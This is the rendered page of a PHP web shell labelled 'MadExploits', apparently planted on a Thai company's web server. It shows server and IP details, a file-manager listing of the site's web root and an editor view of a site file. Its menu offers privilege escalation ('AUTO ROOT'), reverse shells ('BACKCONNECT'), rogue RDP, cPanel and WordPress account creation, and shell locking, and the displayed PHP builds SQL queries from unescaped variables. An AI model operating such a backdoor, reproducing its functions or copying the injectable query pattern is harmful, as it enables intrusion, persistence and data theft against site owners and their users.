Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.218.189.170
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
sniperthailand.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
assets2
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
lasery
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
.htaccess
1.2
KB
-rw-r--r--
0language.php
1.91
KB
-rwxr-xr-x
1Head.php
20.57
KB
-rwxr-xr-x
2HeadMenu.php
14.78
KB
-rwxr-xr-x
2banner.php
4.68
KB
-rwxr-xr-x
3Footer.php
10.82
KB
-rwxr-xr-x
4End.php
5.74
KB
-rwxr-xr-x
about.php
12.83
KB
-rw-r--r--
contact.php
6.64
KB
-rwxr-xr-x
detail.php
11.99
KB
-rwxr-xr-x
download.php
9.8
KB
-rwxr-xr-x
index.php
173
B
-rwxr-xr-x
news-details.php
5.92
KB
-rwxr-xr-x
news.php
5.83
KB
-rwxr-xr-x
product.php
16.06
KB
-rwxr-xr-x
product_category.php
8.7
KB
-rwxr-xr-x
product_category3.php
14.71
KB
-rwxr-xr-x
product_category4.php
5.26
KB
-rwxr-xr-x
product_contact.php
1.87
KB
-rwxr-xr-x
product_detail.php
24.13
KB
-rwxr-xr-x
product_detail_More_products.p...
7.61
KB
-rwxr-xr-x
product_left_cat.php
7.23
KB
-rwxr-xr-x
search.php
4.3
KB
-rwxr-xr-x
service.php
3.8
KB
-rwxr-xr-x
topic-product.php
1.82
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : topic-product.php
<section id="topcat"> <div class="container"> <div class="row"> <div class="categories"> <ul class="categories-top"> <?PHP $SQL_Category = " SELECT ProductCategory2_ID , ProductCategory_ID , ProductCategory2_Name , StatusProductCategory2_ID FROM product_category2 WHERE StatusProductCategory2_ID = 1 AND ProductCategory_ID = $ProductCategory_ID ORDER BY ProductCategory2_Sort "; $objQuery_Category = $objConnect->query($SQL_Category); while ($objResult_Category = mysqli_fetch_array($objQuery_Category)) { $ProductCategory2Name = $objResult_Category["ProductCategory2_Name"]; $ProductCategory2ID = $objResult_Category["ProductCategory2_ID"]; $SQL_Category3 = " SELECT product_category3.ProductCategory3_ID , product_category3.ProductCategory3_Name , product_category3.ProductCategory3_Sort, product_category3.StatusProductCategory3_ID , product_category3.ProductCategory2_ID FROM product_category3 WHERE product_category3.StatusProductCategory3_ID = 1 AND product_category3.ProductCategory2_ID = $ProductCategory2ID ORDER BY product_category3.ProductCategory3_Sort "; $objQuery_Category3 = $objConnect->query($SQL_Category3); while ($objResult_Category3 = mysqli_fetch_array($objQuery_Category3)) { $ProductCategory3ID2 = $objResult_Category3["ProductCategory3_ID"]; } if($ProductCategory2ID == 198){ $LinkHref = 'product_category3.php?c3='.$ProductCategory3ID2.''; }else if ($ProductCategory2ID == 193) { $LinkHref = 'product_category3.php?c3='.$ProductCategory3ID2.''; } else{ $LinkHref = 'product_category.php?c2='.$ProductCategory2ID.''; } ?> <li> <a href="<?= $LinkHref; ?>" style="font-size: 15px;height: 70px;"><?= $ProductCategory2Name; ?></a> </li> <?PHP } ?> </ul> </div> </div> </div> </section>
Close